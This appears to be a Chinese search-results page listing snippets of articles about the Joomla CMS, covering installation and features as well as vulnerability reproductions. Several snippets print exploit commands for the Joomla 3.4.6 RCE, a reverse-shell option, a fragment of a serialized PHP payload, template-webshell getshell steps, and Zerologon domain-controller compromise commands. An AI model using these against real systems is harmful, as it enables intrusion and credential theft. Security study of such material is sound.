首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏技术杂记

    Install Joomla

    192.168.122.1/24 brd 192.168.122.255 scope global virbr0 valid_lft forever preferred_lft forever 5: MULTICAST> mtu 1500 qdisc pfifo_fast master virbr0 state DOWN qlen 1000 link/ether 52:54:00:14:54:5c root 327 3月 12 18:25 installation drwxr-xr-x 4 root root 54 3月 12 18:25 language drwxr-xr-x 5 4872 3月 12 18:25 README.txt -rw-r--r-- 1 root root 836 3月 12 18:25 robots.txt.dist drwxr-xr-x 5 3月 12 18:25 README.txt -rw-r--r-- 1 apache apache 836 3月 12 18:25 robots.txt.dist drwxr-xr-x 5

    1.3K30发布于 2021-08-11
  • 来自专栏黑白天安全团队

    Joomla漏洞总结

    Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现 漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https 运行脚本检验是否存在漏洞 python3 Joomla-3.4.6-RCE.py -t http://10.12.1.25/Joomla_3.4.6-Stable-Full_Package/ ? 通过Joomla中的Gadget,可造成任意代码执行的结果。 \0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5: {s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert

    3K20发布于 2020-09-24
  • 来自专栏Joomla

    Joomla功能介绍

    joomla是什么?Joomla! Joomla!是一套自由的开源软件,使用GPL授权,任何人随时都能下载 Joomla! 并立即使用它。 响应式布局,电脑端和移动端可以同步优化;支持伪静态功能,可自定义每个页面的静态页面名称(URL);支持站内锚文本、TAG标签、上一条下一条功能,用于增加网站内链和突出关键词;网站模板源码采用CSS3+HTML5标准框架

    1.2K30编辑于 2023-08-29
  • 来自专栏Joomla

    Joomla系统简介

    系统名称 基于joomla4的多语言企业建站系统(简称:Ecoxiu多语言企业建站系统) 操作系统要求 程序具备跨平台特性,可以运行于 Linux/Unix 及微软 Windows  XP/2000/2003 语言及数据库支撑环境要求: Joomla企业网站管理系统需要服务器上装有如下软件:  1、可用的 httpd 服务器(如 Apache、Zeus、IIS 等) undefined2、php 7.2.5 2、由于 Joomla企业网站管理系统的数据表具有前缀设计,因此通常情况下可以将 Joomla企业网站管理系统与其他软件安装在同一个数据库中,或采用不同的前缀名从而在同一个数据库中安装多个Joomla企业网站管理系统而不产生冲突 Joomla自2005年发行第一版本以来,获得广泛的关注和好评,曾多次获得开源CMS大奖。Joomla由社区驱动,全球约有超过50万开发者在不断的为Joomla贡献代码和想法。 Joomla具有非常友好的后台,即使你不具备任何的IT技能,也能使用joomla搭建和管理。

    85760编辑于 2023-08-29
  • 来自专栏Joomla

    Joomla优势特点

    另外,Joomla创建的文章页面从Title到H1到H6、图片ALT进行自动补充规范。 超过70多种国家语言支持Joomla一直重视多语言的内容管理,支持超过70个国家的语言翻译。joomla为菜单、文章、模块、分类等管理单元分别设立了多语言设立机制,用于创建多语言网站页面切换。 在3.7.5版本以后,Joomla集成了“多语言管理中心”功能,用于多语言的一对一内容管理。批量处理功能可以对菜单的访问权限进行批量设置,还可以批量复制、移动菜单。 Joomla 2.5 同时还增加了文章、分类、链接批量处理功能。 高度客制和开发弹性对于网站程序开发者和美工设计者,Joomla保留了最大的客制化弹性和整合能力。全世界的网站相关开发人员,都十分关注与推荐这套系统。

    71730编辑于 2023-08-29
  • 来自专栏网络安全攻防

    Joomla后台模板Getshell技巧

    文章前言 本篇文章我们主要介绍在获取到Joomla后台管理权限的情况下如何通过后台来实现Getshell的两种利用方式 GetShell Metasploit 首先我们使用site_admin/123456 登录Joomla后台 在获取到Joomla的后台操作权限后我们可以通过在后台修改主题文件的方式来获取shell权限,这里我们随意选择一个主题 选择查看模板文件的详细信息 选择error.php文件 然后使用 msfvenom中生成的webshell文件内容替换上面error.php文件内容 保存后访问Beez3主题下的error.php文件便可成功的突破边界 http://192.168.204.137/joomla 随后我们直接修改模板文件的内容为上面的php-reverse-shell.php,同时修改文件中的反弹shell的地址和端口信息 随后开启监听 在WEB端访问上述的error.php文件 随后反弹shell回来 文末小结 此文仅作为Joomla 后台GetShell的利用思路介绍,日常打靶机的时候Joomla遇到的可能多一些,正常的红队评估测试中外网少之又少,很少见到~

    2K10编辑于 2024-01-09
  • 来自专栏安全漏洞环境学习

    Joomla 3.4.6-RCE漏洞复现

    该漏洞本质上这是一个Session反序列化导致的RCE漏洞,由于Joomla对于Session的特殊处理,导致漏洞触发并不需要登陆。 controller=post&action=view&id_post=41 0X2 环境搭建 下载源码地址 https://github.com/joomla/joomla-cms/releases/ tag/3.4.6https://downloads.joomla.org/it/cms/joomla3/3-4-6 本过程使用phpstudy ? 默认后台地址 http://172.26.14.242/Joomla_3.4.6/administrator/ ? msfconsole-->reload_all-->search joomla ?

    2K10发布于 2019-10-24
  • 来自专栏洛米唯熊

    Joomla 3.4.6-RCE预警

    0x00:简介 1、Joomla是一套全球有名的CMS系统。 2、Joomla基于PHP语言加上MySQL数据库所开发出来的WEB软件系统,目前最新版本是3.9.12。 3、Joomla可以在多种不同的平台上部署并且运行。 ? ‍‍ 0x01:环境配置 RCE:gayhub上有。 环境下载:https://downloads.joomla.org/it/cms/joomla3/3-4-6 0x02:漏洞复现 0、漏洞位置 http://x.x.x.x/configuration.php 影响范围:3.0.0-3.4.6 1、漏洞验证 python3 Joomla-3.4.6-RCE.py -t http://172.20.10.4 ?

    1.2K30发布于 2019-10-09
  • 来自专栏Tommonkey

    Joomla_rce漏洞总结

    Joomla cms是由php+myysql数据库开发的一套内容管理系统,几乎适合从个人网站到各种企业网站、分类信息系统、电商销售类型的各类网站,在国内也有诸多资源提供Joomla免费下载。 登录首页后,直接在url后添加:/administrator/index.php进入后台登录页面,输入默认密码:admin/admin以超级管理员身份进入joomla的后台 图片 图片 COM_USERS_CONFIG_FIELD_DOMAINS_LABEL" description="COM_USERS_CONFIG_FIELD_DOMAINS_DESC" multiple="true" layout="joomla.form.field.subform.repeatable-table JGLOBAL_HISTORY_LIMIT_OPTIONS_LABEL" description="JGLOBAL_HISTORY_LIMIT_OPTIONS_DESC" filter="integer" default="5" COM_USERS_CONFIG_FIELD_MAILBODY_SUFFIX_LABEL" description="COM_USERS_CONFIG_FIELD_MAILBODY_SUFFIX_DESC" rows="5"

    2.4K20编辑于 2023-03-20
  • 来自专栏Ms08067安全实验室

    Joomla 3.4.6 RCE复现及分析

    作者:whojoe(MS08067安全实验室SRST TEAM成员) 前言 前几天看了下PHP 反序列化字符逃逸学习,有大佬简化了一下joomla3.4.6rce的代码,今天来自己分析学习一下。 环境搭建 Joomla 3.4.6 : https://downloads.joomla.org/it/cms/joomla3/3-4-6 php :5.4.45nts(不支持php7) 影响版本: 3.0.0 --- 3.4.6 漏洞利用: https://github.com/SecurityCN/Vulnerability-analysis/tree/master/Joomla (https://github.com /SecurityCN/Vulnerability-analysis/tree/master/Joomla) 要求PHP Version >= 5.3.10 反序列化长度扩展分析 0CTF-2016-piapiapia 即可查看结果 [2rcoqjn639.png] 经过base64解密 [ftxyxgplpc.png] joomla中的利用 代码是从大佬那里哪来的,具体如下 <?

    3.6K20发布于 2020-06-06
  • 来自专栏生信情报站

    joomla本地安装全过程

    工具包 xampp joomla 步骤 点击xampp安装包安装在本地,如我的目录为 F:\baimos 在浏览器中输入http://localhost/phpmyadmin 通过SQL建立数据库 解压joomla到目录 F:\baimos\htdocs\Joomla目的是方便多个网站分开管理 在浏览器中输入http://localhost/joomla 进入joomla安装引导界面 前台地址http://localhost/joomla 后台地址 http://localhost/joomla/administrator 安装中遇到的问题 问题:安装进度停在数据库创建, 解决 :进入Joomla\installation\sql\mysql 找到joomla.sql,替换“ENGINE=InnoDB”为 “ENGINE=MyIsam”。

    1.2K10发布于 2021-01-13
  • 来自专栏Khan安全团队

    Joomla 3.0-3.4.6-rce复现

    00x00 前言 Joomla是一套内容管理系统,由PHP加Mysql数据库所开发的系统。 该漏洞本质上这是一个Session反序列化导致的RCE漏洞,由于Joomla对于Session的特殊处理,进行伪造session从而导致session反序列化。 Joomla\libraries\joomla\session\storage\database.php ? ? 00x02 漏洞复现 Joomla-3.4.6下载:https://downloads.joomla.org/cms/joomla3/3-4-6 站点搭建-设置数据库。 ? ? 使用现有脚本进行验证Joomla-3.4.6-RCE ? 写入一句话 ? configuration.php文末发现被写入后面 ? url和密码用菜刀连上 ?

    1.3K10发布于 2020-03-08
  • 来自专栏HACK学习

    Joomla 3.4.6-RCE漏洞复现

    0x00:简介 1、Joomla是一套全球有名的CMS系统。 2、Joomla基于PHP语言加上MySQL数据库所开发出来的WEB软件系统,目前最新版本是3.9.12。 3、Joomla可以在多种不同的平台上部署并且运行。 0x01 环境配置 环境下载:https://downloads.joomla.org/it/cms/joomla3/3-4-6 此漏洞影响范围3.0.0 --> 3.4.6,也可以使用vulhub找环境 https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2015-8562 此环境版本为Joomla 3.4.5 EXP下载地址:https: -3.4.6 2.2 漏洞验证 Copypython3 Joomla-3.4.6-RCE.py -t http://172.20.10.4 ?

    1.8K50发布于 2019-10-13
  • 来自专栏Joomla CMS

    如何为Joomla标签创建布局覆盖

    Joomla允许您通过覆盖自定义几乎任何特性。 布局覆盖是一种覆盖类型,允许您自定义小元素,比如文章作者或发布日期。 在本教程中,我将向您展示如何为Joomla标签创建布局覆盖。 下图显示了Joomla文章中默认的标签样式,使用的是Protostar模板:  这些标签是可链接的。在这个例子中,我想保留标签但是删除链接。 步骤1:创建布局覆盖 让我们将Joomla核心中的一些文件复制到模板中,这样我们就可以安全地定制它们。 去扩展 模板 模板 找到模板的详细信息和文件 单击“创建覆盖”选项卡。 单击Layouts列中的“content” 这将在/templates/your-template/html/layouts/joomla/content/文件夹中生成一组文件。 步骤2:自定义标签布局 回到“编辑器”选项卡 导航到html > layout > joomla > content > tags.php 在这里,您可以更改呈现文章上显示的标签的代码。

    2K10发布于 2019-07-30
  • 来自专栏FreeBuf

    Joomla!3.7.0 SQL注入攻击漏洞分析

    Joomla是一套世界第二流行的内容管理系统。 作者 | Shun Joomla实际有两个开源的东西: 1、Joomla内容管理系统即JoomlaCMS(Content Management System, CMS)。 2、Joomla Platform(Joomla框架)。理论上来说它几乎无所不能,除了网站,还可以进行广泛的web开发、手机应用开发等等。 如果您的网站是基于流行的Joomla内容管理系统,请确保您已将您的平台更新到今天发布的最新版本。 漏洞描述 项目: Joomla! 修复建议 升级最新版完整安装包或升级补丁包 https://downloads.joomla.org/cms/joomla3/3-7-1

    2.6K50发布于 2018-02-24
  • 来自专栏FreeBuf

    Joomla高危漏洞扫描事件分析

    1.摘要 12月14日,Joomla官方网站紧急发布了一条由于安全漏洞引发的版本更新(3.4.6),根据安全公司sucuri对外发布的信息,此事扫描时间是利用了Joomla的反序列化特性的问题导致命令执行的高危漏洞 :{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5: 8:"feed_url";s:37:”phpinfo();JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5: 4.影响危害 易攻击对象: 采用Joomla系统 版本低于3.4.6(也就是12月15日之前的所有版本) 5.修补加固建议 此次事件利用的漏洞影响范围非常广泛,所以请所有采用Joomla 6.常见问题FAQ Joomla是什么?

    1.9K80发布于 2018-02-07
  • 来自专栏闪石星曜CyberSecurity

    Joomla 3.4.6 远程代码执行漏洞复现

    /it/cms/joomla3/3-4-6 下载解压后放入wamp/www/Joomla或者phpstudy/PHPTutorial/WWW/Joomla/目录下,访问http://127.0.0.1 /Joomla/准备安装 安装流程如下: ? 0x04 漏洞利用 ---- 下载漏洞利用脚本: https://github.com/kiks7/rusty_joomla_rce 漏洞检测: python3 rusty_joomla_exploit.py 漏洞利用: python3 rusty_joomla_exploit.py -t http://127.0.0.1/Joomla/ -e -l 127.0.0.1 -p 2333 (-e -l -p参数可以反弹 修复方式 ---- 更新至官网最新版本: https://downloads.joomla.org Poc脚本: https://github.com/kiks7/rusty_joomla_rce

    2.5K30发布于 2019-10-15
  • 来自专栏Joomla CMS

    开源建站系统,Joomla 4即将出现

    Joomla项目宣布推出Joomla 4.0 Alpha 第10个版本,公开进行测试。 这个版本是什么? 此版本包括将在4.0.0版中包含的大多数Joomla Core库更改。其中一些更改将需要对扩展进行少量更改。有关4.0版的已知向后兼容性问题的完整列表。 Joomla 4有什么新东西? 我们坚定地致力于让下一代Joomla成为最好的。Joomla 4将提供简单性和更好的用户体验,同时也是开发人员更强大的系统。 通过从Joomla 3.x中删除已弃用的函数以及使用PHP命名空间,开发人员可以提供比以前更强大和创新的应用程序 眨眼间安装Joomla。 下载JOOMLA4.0 ALPHA 10

    3.8K60发布于 2019-07-17
  • 来自专栏安全学习记录

    靶场学习-从joomla到拿下域控

    访问网站主页,是一个博客网站 常规的目录扫描 这里发现一个疑似后台地址,访问http://192.168.2.252/administrator/ 为 joomla 站点,印象中记得有rce的漏洞 @ 使用navicat进行连接,可看到这里的密码为bcrypt加密,这个是不可逆的,一般是通过重新生成hash进行替换 重新生成一个hash发现还是登陆不上 这时候去阅读joomla的官方文档, protocol = TCP port = 3389 name = rdp CVE-2020-1472漏洞利用 python3 cve-2020-1472-exploit.py WIN-03OO218S5B8 192.168.111.130 secretsdump.py Mikasa.com/WIN-03OO218S5B8$@192.168.111.130 -just-dc -no-pass psexec.py

    1.5K20编辑于 2022-12-26
  • 来自专栏网络安全自修室

    Joomla未授权访问漏洞到代码执行

    2月16日,Joomla官方发布安全公告,修复了Joomla! CMS中的一个未授权访问漏洞(CVE-2023-23752),目前该漏洞的细节及PoC/EXP已公开。 漏洞介绍 在 Joomla! 版本为4.0.0 到 4.2.7中发现了一个漏洞,在Joomla受影响的版本中由于对Web服务端点的访问限制不当,远程攻击者可以绕过安全限制获得Web应用程序敏感信息。 Joomla! 受影响版本 4.0.0 <= Joomla <= 4.2.7 不受影响版本Joomla >= 4.2.8 Joomla 3及以下版本均不受该漏洞影响 漏洞详情 在Joomla受影响的版本中由于对Web服务端点的访问限制不当 image.png 漏洞复现 FOFA指纹 product="Joomla" image.png 或者 body="Joomla! 4?" 然而,似乎有大量面向互联网的 Joomla! 使用未_绑定_到127.0.0.1. Censys 显示了数千个 Joomla! 服务器与暴露的 MySQL 服务器位于同一位置。

    1.6K10编辑于 2023-09-02
领券